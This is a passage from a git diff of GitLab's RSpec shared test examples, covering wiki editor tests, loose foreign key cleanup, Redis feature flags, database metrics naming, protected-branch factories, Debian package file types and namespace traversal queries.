li') } + let(:tabs) { page.all('.js-snippets-nav-tabs li') } it 'shows a tab for All snippets and count' do tab = tabs[0] diff --git a/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb b/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb index 7ced8508a31..a456b76b324 100644 --- a/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb +++ b/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb @@ -138,11 +138,26 @@ RSpec.shared_examples 'User updates wiki page' do end context 'when using the content editor' do - before do - click_button 'Use the new editor' + context 'with feature flag on' do + before do + click_button 'Edit rich text' + end + + it_behaves_like 'edits content using the content editor' end - it_behaves_like 'edits content using the content editor' + context 'with feature flag off' do + before do + stub_feature_flags(wiki_switch_between_content_editor_raw_markdown: false) + visit(wiki_path(wiki)) + + click_link('Edit') + + click_button 'Use the new editor' + end + + it_behaves_like 'edits content using the content editor' + end end end diff --git a/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb b/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb index 96df5a5f972..eec911f3b6f 100644 --- a/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb +++ b/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb @@ -161,7 +161,7 @@ RSpec.shared_examples 'User views a wiki page' do commit = wiki.commit visit wiki_page_path(wiki, wiki_page, version_id: commit, action: :diff) - expect(page).to have_content('by John Doe') + expect(page).to have_content('by Sidney Jones') expect(page).to have_content('updated home') expect(page).to have_content('Showing 1 changed file with 1 addition and 3 deletions') 
expect(page).to have_content('some link') @@ -174,7 +174,7 @@ RSpec.shared_examples 'User views a wiki page' do commit = wiki.commit('HEAD^') visit wiki_page_path(wiki, wiki_page, version_id: commit, action: :diff) - expect(page).to have_content('by John Doe') + expect(page).to have_content('by Sidney Jones') expect(page).to have_content('updated home') expect(page).to have_content('Showing 1 changed file with 1 addition and 3 deletions') expect(page).to have_content('some link') @@ -188,7 +188,7 @@ RSpec.shared_examples 'User views a wiki page' do commit = wiki.commit('HEAD^') visit wiki_page_path(wiki, wiki_page, version_id: commit, action: :diff) - expect(page).to have_content('by John Doe') + expect(page).to have_content('by Sidney Jones') expect(page).to have_content('created page: home') expect(page).to have_content('Showing 1 changed file with 4 additions and 0 deletions') expect(page).to have_content('Look at this') diff --git a/spec/support/shared_examples/lib/gitlab/background_migration/mentions_migration_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/background_migration/mentions_migration_shared_examples.rb deleted file mode 100644 index 7707e79386c..00000000000 --- a/spec/support/shared_examples/lib/gitlab/background_migration/mentions_migration_shared_examples.rb +++ /dev/null @@ -1,108 +0,0 @@ -# frozen_string_literal: true - -RSpec.shared_examples 'resource mentions migration' do |migration_class, resource_class_name| - it 'migrates resource mentions' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - resource_class = "#{Gitlab::BackgroundMigration::UserMentions::Models}::#{resource_class_name}".constantize - - expect do - subject.perform(resource_class_name, join, conditions, false, resource_class.minimum(:id), resource_class.maximum(:id)) - end.to change { user_mentions.count }.by(1) - - user_mention = user_mentions.last - expect(user_mention.mentioned_users_ids.sort).to 
eq(mentioned_users.pluck(:id).sort) - expect(user_mention.mentioned_groups_ids.sort).to eq([group.id]) - expect(user_mention.mentioned_groups_ids.sort).not_to include(inaccessible_group.id) - - # check that performing the same job twice does not fail and does not change counts - expect do - subject.perform(resource_class_name, join, conditions, false, resource_class.minimum(:id), resource_class.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end - -RSpec.shared_examples 'resource notes mentions migration' do |migration_class, resource_class_name| - it 'migrates mentions from note' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - - # there are 5 notes for each noteable_type, but two do not have mentions and - # another one's noteable_id points to an inexistent resource - expect(notes.where(noteable_type: resource_class_name).count).to eq 5 - expect(user_mentions.count).to eq 0 - - expect do - subject.perform(resource_class_name, join, conditions, true, Note.minimum(:id), Note.maximum(:id)) - end.to change { user_mentions.count }.by(2) - - # check that the user_mention for regular note is created - user_mention = user_mentions.first - expect(Note.find(user_mention.note_id).system).to be false - expect(user_mention.mentioned_users_ids.sort).to eq(users.pluck(:id).sort) - expect(user_mention.mentioned_groups_ids.sort).to eq([group.id]) - expect(user_mention.mentioned_groups_ids.sort).not_to include(inaccessible_group.id) - - # check that the user_mention for system note is created - user_mention = user_mentions.second - expect(Note.find(user_mention.note_id).system).to be true - expect(user_mention.mentioned_users_ids.sort).to eq(users.pluck(:id).sort) - expect(user_mention.mentioned_groups_ids.sort).to eq([group.id]) - expect(user_mention.mentioned_groups_ids.sort).not_to include(inaccessible_group.id) - - # check that performing the same job twice does not fail and does not change counts - expect do - 
subject.perform(resource_class_name, join, conditions, true, Note.minimum(:id), Note.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end - -RSpec.shared_examples 'schedules resource mentions migration' do |resource_class, is_for_notes| - before do - stub_const("#{described_class.name}::BATCH_SIZE", 1) - end - - it 'schedules background migrations' do - Sidekiq::Testing.fake! do - freeze_time do - resource_count = is_for_notes ? Note.count : resource_class.count - expect(resource_count).to eq 5 - - migrate! - - migration = described_class::MIGRATION - join = described_class::JOIN - conditions = described_class::QUERY_CONDITIONS - delay = described_class::DELAY - - expect(migration).to be_scheduled_delayed_migration(1 * delay, resource_class.name, join, conditions, is_for_notes, resource1.id, resource1.id) - expect(migration).to be_scheduled_delayed_migration(2 * delay, resource_class.name, join, conditions, is_for_notes, resource2.id, resource2.id) - expect(migration).to be_scheduled_delayed_migration(3 * delay, resource_class.name, join, conditions, is_for_notes, resource3.id, resource3.id) - expect(BackgroundMigrationWorker.jobs.size).to eq 3 - end - end - end -end - -RSpec.shared_examples 'resource migration not run' do |migration_class, resource_class_name| - it 'does not migrate mentions' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - resource_class = "#{Gitlab::BackgroundMigration::UserMentions::Models}::#{resource_class_name}".constantize - - expect do - subject.perform(resource_class_name, join, conditions, false, resource_class.minimum(:id), resource_class.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end - -RSpec.shared_examples 'resource notes migration not run' do |migration_class, resource_class_name| - it 'does not migrate mentions' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - - expect do - subject.perform(resource_class_name, join, 
conditions, true, Note.minimum(:id), Note.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end diff --git a/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb index bd8bdd70ce5..bce889b454d 100644 --- a/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb +++ b/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb @@ -9,7 +9,7 @@ RSpec.shared_examples_for 'value stream analytics event' do it { expect(described_class.identifier).to be_a_kind_of(Symbol) } it { expect(instance.object_type.ancestors).to include(ApplicationRecord) } it { expect(instance).to respond_to(:timestamp_projection) } - it { expect(instance).to respond_to(:markdown_description) } + it { expect(instance).to respond_to(:html_description) } it { expect(instance.column_list).to be_a_kind_of(Array) } describe '#apply_query_customization' do diff --git a/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb index 41d3d76b66b..03344584361 100644 --- a/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb +++ b/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb @@ -1,6 +1,6 @@ # frozen_string_literal: true RSpec.shared_examples 'a permitted attribute' do |relation_sym, permitted_attributes, additional_attributes = []| - let(:prohibited_attributes) { %i[remote_url my_attributes my_ids token my_id test] } + let(:prohibited_attributes) { %w[remote_url my_attributes my_ids token my_id test] } let(:import_export_config) { Gitlab::ImportExport::Config.new.to_h } let(:project_relation_factory) { Gitlab::ImportExport::Project::RelationFactory } @@ -8,7 +8,7 @@ RSpec.shared_examples 'a permitted attribute' do 
|relation_sym, permitted_attrib let(:relation_hash) { (permitted_attributes + prohibited_attributes).map(&:to_s).zip([]).to_h } let(:relation_name) { project_relation_factory.overrides[relation_sym]&.to_sym || relation_sym } let(:relation_class) { project_relation_factory.relation_class(relation_name) } - let(:excluded_keys) { import_export_config.dig(:excluded_keys, relation_sym) || [] } + let(:excluded_keys) { (import_export_config.dig(:excluded_attributes, relation_sym) || []).map(&:to_s) } let(:cleaned_hash) do Gitlab::ImportExport::AttributeCleaner.new( @@ -18,7 +18,7 @@ RSpec.shared_examples 'a permitted attribute' do |relation_sym, permitted_attrib ).clean end - let(:permitted_hash) { subject.permit(relation_sym, relation_hash) } + let(:permitted_hash) { subject.permit(relation_sym, relation_hash).transform_keys { |k| k.to_s } } if described_class.new.permitted_attributes_defined?(relation_sym) it 'contains only attributes that are defined as permitted in the import/export config' do @@ -26,11 +26,11 @@ RSpec.shared_examples 'a permitted attribute' do |relation_sym, permitted_attrib end it 'does not contain attributes that would be cleaned with AttributeCleaner' do - expect(cleaned_hash.keys + additional_attributes.to_a).to include(*permitted_hash.keys) + expect(cleaned_hash.keys + additional_attributes.to_a.map(&:to_s)).to include(*permitted_hash.keys) end it 'does not contain prohibited attributes that are not related to given relation' do - expect(permitted_hash.keys).not_to include(*prohibited_attributes.map(&:to_s)) + expect(permitted_hash.keys).not_to include(*prohibited_attributes) end else it 'is disabled' do diff --git a/spec/support/shared_examples/lib/gitlab/redis/multi_store_feature_flags_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/redis/multi_store_feature_flags_shared_examples.rb new file mode 100644 index 00000000000..046c70bf779 --- /dev/null +++ 
b/spec/support/shared_examples/lib/gitlab/redis/multi_store_feature_flags_shared_examples.rb @@ -0,0 +1,43 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'multi store feature flags' do |use_primary_and_secondary_stores, use_primary_store_as_default| + context "with feature flag :#{use_primary_and_secondary_stores} is enabled" do + before do + stub_feature_flags(use_primary_and_secondary_stores => true) + end + + it 'multi store is enabled' do + expect(subject.use_primary_and_secondary_stores?).to be true + end + end + + context "with feature flag :#{use_primary_and_secondary_stores} is disabled" do + before do + stub_feature_flags(use_primary_and_secondary_stores => false) + end + + it 'multi store is disabled' do + expect(subject.use_primary_and_secondary_stores?).to be false + end + end + + context "with feature flag :#{use_primary_store_as_default} is enabled" do + before do + stub_feature_flags(use_primary_store_as_default => true) + end + + it 'primary store is enabled' do + expect(subject.use_primary_store_as_default?).to be true + end + end + + context "with feature flag :#{use_primary_store_as_default} is disabled" do + before do + stub_feature_flags(use_primary_store_as_default => false) + end + + it 'primary store is disabled' do + expect(subject.use_primary_store_as_default?).to be false + end + end +end diff --git a/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb b/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb index 7ccd9533811..8f3a93de509 100644 --- a/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb +++ b/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb @@ -4,17 +4,12 @@ RSpec.shared_examples 'it has loose foreign keys' do let(:factory_name) { nil } let(:table_name) { described_class.table_name } let(:connection) { described_class.connection } - - it 'includes the LooseForeignKey module' do - expect(described_class.ancestors).to 
include(LooseForeignKey) - end - - it 'responds to #loose_foreign_key_definitions' do - expect(described_class).to respond_to(:loose_foreign_key_definitions) - end + let(:fully_qualified_table_name) { "#{connection.current_schema}.#{table_name}" } + let(:deleted_records) { LooseForeignKeys::DeletedRecord.where(fully_qualified_table_name: fully_qualified_table_name) } it 'has at least one loose foreign key definition' do - expect(described_class.loose_foreign_key_definitions.size).to be > 0 + definitions = Gitlab::Database::LooseForeignKeys.definitions_by_table[table_name] + expect(definitions.size).to be > 0 end it 'has the deletion trigger present' do @@ -32,9 +27,11 @@ RSpec.shared_examples 'it has loose foreign keys' do it 'records record deletions' do model = create(factory_name) # rubocop: disable Rails/SaveBang - model.destroy! - deleted_record = LooseForeignKeys::DeletedRecord.find_by(fully_qualified_table_name: "#{connection.current_schema}.#{table_name}", primary_key_value: model.id) + # using delete to avoid cross-database modification errors when associations with dependent option are present + model.delete + + deleted_record = deleted_records.find_by(primary_key_value: model.id) expect(deleted_record).not_to be_nil end @@ -42,11 +39,36 @@ RSpec.shared_examples 'it has loose foreign keys' do it 'cleans up record deletions' do model = create(factory_name) # rubocop: disable Rails/SaveBang - expect { model.destroy! 
}.to change { LooseForeignKeys::DeletedRecord.count }.by(1) + expect { model.delete }.to change { deleted_records.count }.by(1) LooseForeignKeys::ProcessDeletedRecordsService.new(connection: connection).execute - expect(LooseForeignKeys::DeletedRecord.status_pending.count).to be(0) - expect(LooseForeignKeys::DeletedRecord.status_processed.count).to be(1) + expect(deleted_records.status_pending.count).to be(0) + expect(deleted_records.status_processed.count).to be(1) + end +end + +RSpec.shared_examples 'cleanup by a loose foreign key' do + let(:foreign_key_definition) do + foreign_keys_for_parent = Gitlab::Database::LooseForeignKeys.definitions_by_table[parent.class.table_name] + foreign_keys_for_parent.find { |definition| definition.from_table == model.class.table_name } + end + + def find_model + model.class.find_by(id: model.id) + end + + it 'deletes the model' do + parent.delete + + expect(find_model).to be_present + + LooseForeignKeys::ProcessDeletedRecordsService.new(connection: model.connection).execute + + if foreign_key_definition.on_delete.eql?(:async_delete) + expect(find_model).not_to be_present + else + expect(find_model[foreign_key_definition.column]).to eq(nil) + end end end diff --git a/spec/support/shared_examples/mailers/notify_shared_examples.rb b/spec/support/shared_examples/mailers/notify_shared_examples.rb index e1f7a9030e2..20ed380fb18 100644 --- a/spec/support/shared_examples/mailers/notify_shared_examples.rb +++ b/spec/support/shared_examples/mailers/notify_shared_examples.rb @@ -161,6 +161,12 @@ RSpec.shared_examples 'it should not have Gmail Actions links' do end end +RSpec.shared_examples 'it should show Gmail Actions Join now link' do + it_behaves_like 'it should have Gmail Actions links' + + it { is_expected.to have_body_text('Join now') } +end + RSpec.shared_examples 'it should show Gmail Actions View Issue link' do it_behaves_like 'it should have Gmail Actions links' diff --git 
a/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb b/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb index c06083ba952..6e8c340582a 100644 --- a/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb +++ b/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb @@ -1,7 +1,11 @@ # frozen_string_literal: true RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| - let(:db_config_name) { ::Gitlab::Database.db_config_names.first } + let(:db_config_name) do + db_config_name = ::Gitlab::Database.db_config_names.first + db_config_name += "_replica" if db_role == :secondary + db_config_name + end let(:expected_payload_defaults) do result = {} @@ -39,15 +43,15 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| db_write_count: record_write_query ? 1 : 0, db_cached_count: record_cached_query ? 1 : 0, db_primary_cached_count: record_cached_query ? 1 : 0, - "db_primary_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, + "db_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, db_primary_count: record_query ? 1 : 0, - "db_primary_#{db_config_name}_count": record_query ? 1 : 0, + "db_#{db_config_name}_count": record_query ? 1 : 0, db_primary_duration_s: record_query ? 0.002 : 0.0, - "db_primary_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, + "db_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, db_primary_wal_count: record_wal_query ? 1 : 0, - "db_primary_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, + "db_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, db_primary_wal_cached_count: record_wal_query && record_cached_query ? 1 : 0, - "db_primary_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 1 : 0 + "db_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 
1 : 0 }) elsif db_role == :replica transform_hash(expected_payload_defaults, { @@ -55,15 +59,15 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| db_write_count: record_write_query ? 1 : 0, db_cached_count: record_cached_query ? 1 : 0, db_replica_cached_count: record_cached_query ? 1 : 0, - "db_replica_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, + "db_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, db_replica_count: record_query ? 1 : 0, - "db_replica_#{db_config_name}_count": record_query ? 1 : 0, + "db_#{db_config_name}_count": record_query ? 1 : 0, db_replica_duration_s: record_query ? 0.002 : 0.0, - "db_replica_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, + "db_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, db_replica_wal_count: record_wal_query ? 1 : 0, - "db_replica_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, + "db_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, db_replica_wal_cached_count: record_wal_query && record_cached_query ? 1 : 0, - "db_replica_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 1 : 0 + "db_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 1 : 0 }) else transform_hash(expected_payload_defaults, { @@ -71,15 +75,15 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| db_write_count: record_write_query ? 1 : 0, db_cached_count: record_cached_query ? 
1 : 0, db_primary_cached_count: 0, - "db_primary_#{db_config_name}_cached_count": 0, + "db_#{db_config_name}_cached_count": 0, db_primary_count: 0, - "db_primary_#{db_config_name}_count": 0, + "db_#{db_config_name}_count": 0, db_primary_duration_s: 0.0, - "db_primary_#{db_config_name}_duration_s": 0.0, + "db_#{db_config_name}_duration_s": 0.0, db_primary_wal_count: 0, - "db_primary_#{db_config_name}_wal_count": 0, + "db_#{db_config_name}_wal_count": 0, db_primary_wal_cached_count: 0, - "db_primary_#{db_config_name}_wal_cached_count": 0 + "db_#{db_config_name}_wal_cached_count": 0 }) end @@ -105,7 +109,11 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| end RSpec.shared_examples 'record ActiveRecord metrics in a metrics transaction' do |db_role| - let(:db_config_name) { ::Gitlab::Database.db_config_name(ApplicationRecord.retrieve_connection) } + let(:db_config_name) do + db_config_name = ::Gitlab::Database.db_config_names.first + db_config_name += "_replica" if db_role == :secondary + db_config_name + end it 'increments only db counters' do if record_query diff --git a/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb b/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb index 03f565e0aac..fe85daa7235 100644 --- a/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb +++ b/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb @@ -80,15 +80,22 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| it 'calls InternalId.generate_next and sets internal id attribute' do iid = rand(1..1000) - expect(InternalId).to receive(:generate_next).with(instance, scope_attrs, usage, any_args).and_return(iid) + # Need to do this before evaluating instance otherwise it gets set + # already in factory + allow(InternalId).to receive(:generate_next).and_return(iid) + subject expect(read_internal_id).to eq(iid) + + expect(InternalId).to 
have_received(:generate_next).with(instance, scope_attrs, usage, any_args) end it 'does not overwrite an existing internal id' do write_internal_id(4711) - expect { subject }.not_to change { read_internal_id } + allow_cross_database_modification_within_transaction(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347091') do + expect { subject }.not_to change { read_internal_id } + end end context 'when the instance has an internal ID set' do @@ -101,6 +108,7 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| .to receive(:track_greatest) .with(instance, scope_attrs, usage, internal_id, any_args) .and_return(internal_id) + subject end end @@ -110,7 +118,11 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| context 'when the internal id has been changed' do context 'when the internal id is automatically set' do it 'clears it on the instance' do - expect_iid_to_be_set_and_rollback + write_internal_id(nil) + + allow_cross_database_modification_within_transaction(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347091') do + expect_iid_to_be_set_and_rollback + end expect(read_internal_id).to be_nil end @@ -120,7 +132,9 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| it 'does not clear it on the instance' do write_internal_id(100) - expect_iid_to_be_set_and_rollback + allow_cross_database_modification_within_transaction(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347091') do + expect_iid_to_be_set_and_rollback + end expect(read_internal_id).not_to be_nil end diff --git a/spec/support/shared_examples/models/chat_integration_shared_examples.rb b/spec/support/shared_examples/models/chat_integration_shared_examples.rb index 72659dd5f3b..e6b270c6188 100644 --- a/spec/support/shared_examples/models/chat_integration_shared_examples.rb +++ b/spec/support/shared_examples/models/chat_integration_shared_examples.rb @@ -71,7 +71,7 @@ RSpec.shared_examples "chat integration" do |integration_name| it 
"does not call #{integration_name} API" do result = subject.execute(sample_data) - expect(result).to be(false) + expect(result).to be_falsy expect(WebMock).not_to have_requested(:post, webhook_url) end end @@ -113,7 +113,7 @@ RSpec.shared_examples "chat integration" do |integration_name| context "with protected branch" do before do - create(:protected_branch, project: project, name: "a-protected-branch") + create(:protected_branch, :create_branch_on_repository, project: project, name: "a-protected-branch") end let(:sample_data) do @@ -309,7 +309,7 @@ RSpec.shared_examples "chat integration" do |integration_name| context "with protected branch" do before do - create(:protected_branch, project: project, name: "a-protected-branch") + create(:protected_branch, :create_branch_on_repository, project: project, name: "a-protected-branch") end let(:sample_data) do @@ -355,5 +355,11 @@ RSpec.shared_examples "chat integration" do |integration_name| end end end + + context 'deployment events' do + let(:sample_data) { Gitlab::DataBuilder::Deployment.build(create(:deployment), Time.now) } + + it_behaves_like "untriggered #{integration_name} integration" + end end end diff --git a/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb b/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb index 2d4c0b60f2b..ad15f82be5e 100644 --- a/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb +++ b/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb @@ -305,7 +305,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch' do before do - create(:protected_branch, project: project, name: 'a-protected-branch') + create(:protected_branch, :create_branch_on_repository, project: project, name: 'a-protected-branch') end let(:data) do @@ -347,7 
+347,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch with protected branches defined using wildcards' do before do - create(:protected_branch, project: project, name: '*-stable') + create(:protected_branch, :create_branch_on_repository, repository_branch_name: '1-stable', project: project, name: '*-stable') end let(:data) do @@ -560,7 +560,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch' do before do - create(:protected_branch, project: project, name: 'a-protected-branch') + create(:protected_branch, :create_branch_on_repository, project: project, name: 'a-protected-branch') end let(:pipeline) do @@ -590,7 +590,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch with protected branches defined usin wildcards' do before do - create(:protected_branch, project: project, name: '*-stable') + create(:protected_branch, :create_branch_on_repository, repository_branch_name: '1-stable', project: project, name: '*-stable') end let(:pipeline) do diff --git a/spec/support/shared_examples/models/member_shared_examples.rb b/spec/support/shared_examples/models/member_shared_examples.rb index a2909c66e22..d5d137922eb 100644 --- a/spec/support/shared_examples/models/member_shared_examples.rb +++ b/spec/support/shared_examples/models/member_shared_examples.rb @@ -301,10 +301,6 @@ RSpec.shared_examples_for "member creation" do end context 'when `tasks_to_be_done` and `tasks_project_id` are passed' do - before do - stub_experiments(invite_members_for_task: true) - end - it 'creates a member_task with the correct attributes', :aggregate_failures do task_project = source.is_a?(Group) ? 
create(:project, group: source) : source described_class.new(source, user, :developer, tasks_to_be_done: %w(ci code), tasks_project_id: task_project.id).execute @@ -397,10 +393,6 @@ RSpec.shared_examples_for "bulk member creation" do end context 'when `tasks_to_be_done` and `tasks_project_id` are passed' do - before do - stub_experiments(invite_members_for_task: true) - end - it 'creates a member_task with the correct attributes', :aggregate_failures do task_project = source.is_a?(Group) ? create(:project, group: source) : source members = described_class.add_users(source, [user1], :developer, tasks_to_be_done: %w(ci code), tasks_project_id: task_project.id) diff --git a/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb b/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb index f08ee820463..23026167b19 100644 --- a/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb +++ b/spec/support/shared_examples/models/packages/debian/component_file_shared_example.rb @@ -23,7 +23,7 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| let_it_be(:component_file_other_file_md5, freeze: can_freeze) { create("debian_#{container_type}_component_file", component: component1_1, architecture: architecture1_1, file_md5: 'other_md5') } let_it_be(:component_file_other_file_sha256, freeze: can_freeze) { create("debian_#{container_type}_component_file", component: component1_1, architecture: architecture1_1, file_sha256: 'other_sha256') } let_it_be(:component_file_other_container, freeze: can_freeze) { create("debian_#{container_type}_component_file", component: component2_1, architecture: architecture2_1) } - let_it_be_with_refind(:component_file_with_file_type_source) { create("debian_#{container_type}_component_file", :source, component: component1_1) } + let_it_be_with_refind(:component_file_with_file_type_sources) { 
create("debian_#{container_type}_component_file", :sources, component: component1_1) } let_it_be(:component_file_with_file_type_di_packages, freeze: can_freeze) { create("debian_#{container_type}_component_file", :di_packages, component: component1_1, architecture: architecture1_1) } subject { component_file_with_architecture } @@ -43,8 +43,8 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| it { is_expected.to belong_to(:architecture).class_name("Packages::Debian::#{container_type.capitalize}Architecture").inverse_of(:files) } end - context 'with :source file_type' do - subject { component_file_with_file_type_source } + context 'with :sources file_type' do + subject { component_file_with_file_type_sources } it { is_expected.to belong_to(:architecture).class_name("Packages::Debian::#{container_type.capitalize}Architecture").inverse_of(:files).optional } end @@ -66,8 +66,8 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| it { is_expected.to validate_presence_of(:architecture) } end - context 'with :source file_type' do - subject { component_file_with_file_type_source } + context 'with :sources file_type' do + subject { component_file_with_file_type_sources } it { is_expected.to validate_absence_of(:architecture) } end @@ -135,10 +135,10 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| end describe '.with_file_type' do - subject { described_class.with_file_type(:source) } + subject { described_class.with_file_type(:sources) } it do - expect(subject.to_a).to contain_exactly(component_file_with_file_type_source) + expect(subject.to_a).to contain_exactly(component_file_with_file_type_sources) end end @@ -214,9 +214,9 @@ RSpec.shared_examples 'Debian Component File' do |container_type, can_freeze| end context 'with a Source file_type' do - subject { component_file_with_file_type_source.relative_path } + subject { component_file_with_file_type_sources.relative_path } - it { 
is_expected.to eq("#{component1_1.name}/source/Source") } + it { is_expected.to eq("#{component1_1.name}/source/Sources") } end context 'with a DI Packages file_type' do diff --git a/spec/support/shared_examples/namespaces/traversal_examples.rb b/spec/support/shared_examples/namespaces/traversal_examples.rb index ac6a843663f..73e22b97abc 100644 --- a/spec/support/shared_examples/namespaces/traversal_examples.rb +++ b/spec/support/shared_examples/namespaces/traversal_examples.rb @@ -205,6 +205,58 @@ RSpec.shared_examples 'namespace traversal' do end end + shared_examples '#ancestors_upto' do + let(:parent) { create(:group) } + let(:child) { create(:group, parent: parent) } + let(:child2) { create(:group, parent: child) } + + it 'returns all ancestors when no namespace is given' do + expect(child2.ancestors_upto).to contain_exactly(child, parent) + end + + it 'includes ancestors upto but excluding the given ancestor' do + expect(child2.ancestors_upto(parent)).to contain_exactly(child) + end + + context 'with asc hierarchy_order' do + it 'returns the correct ancestor ids' do + expect(child2.ancestors_upto(hierarchy_order: :asc)).to eq([child, parent]) + end + end + + context 'with desc hierarchy_order' do + it 'returns the correct ancestor ids' do + expect(child2.ancestors_upto(hierarchy_order: :desc)).to eq([parent, child]) + end + end + + describe '#recursive_self_and_ancestor_ids' do + it 'is equivalent to ancestors_upto' do + recursive_result = child2.recursive_ancestors_upto(parent) + linear_result = child2.ancestors_upto(parent) + expect(linear_result).to match_array recursive_result + end + + it 'makes a recursive query' do + expect { child2.recursive_ancestors_upto.try(:load) }.to make_queries_matching(/WITH RECURSIVE/) + end + end + end + + describe '#ancestors_upto' do + context 'with use_traversal_ids_for_ancestors_upto enabled' do + include_examples '#ancestors_upto' + end + + context 'with use_traversal_ids_for_ancestors_upto disabled' do + before do + 
stub_feature_flags(use_traversal_ids_for_ancestors_upto: false) + end + + include_examples '#ancestors_upto' + end + end + describe '#descendants' do let!(:another_group) { create(:group) } let!(:another_group_nested) { create(:group, parent: another_group) } diff --git a/spec/support/shared_examples/namespaces/traversal_scope_examples.rb b/spec/support/shared_examples/namespaces/traversal_scope_examples.rb index 4c09c1c2a3b..3d52ed30c62 100644 --- a/spec/support/shared_examples/namespaces/traversal_scope_examples.rb +++ b/spec/support/shared_examples/namespaces/traversal_scope_examples.rb @@ -213,6 +213,12 @@ RSpec.shared_examples 'namespace traversal scopes' do it { is_expected.to contain_exactly(deep_nested_group_1, deep_nested_group_2) } end + + context 'with offset and limit' do + subject { described_class.where(id: [group_1, group_2]).offset(1).limit(1).self_and_descendants } + + it { is_expected.to contain_exactly(group_2, nested_group_2, deep_nested_group_2) } + end end describe '.self_and_descendants' do @@ -242,6 +248,19 @@ RSpec.shared_examples 'namespace traversal scopes' do it { is_expected.to contain_exactly(deep_nested_group_1.id, deep_nested_group_2.id) } end + + context 'with offset and limit' do + subject do + described_class + .where(id: [group_1, group_2]) + .limit(1) + .offset(1) + .self_and_descendant_ids + .pluck(:id) + end + + it { is_expected.to contain_exactly(group_2.id, nested_group_2.id, 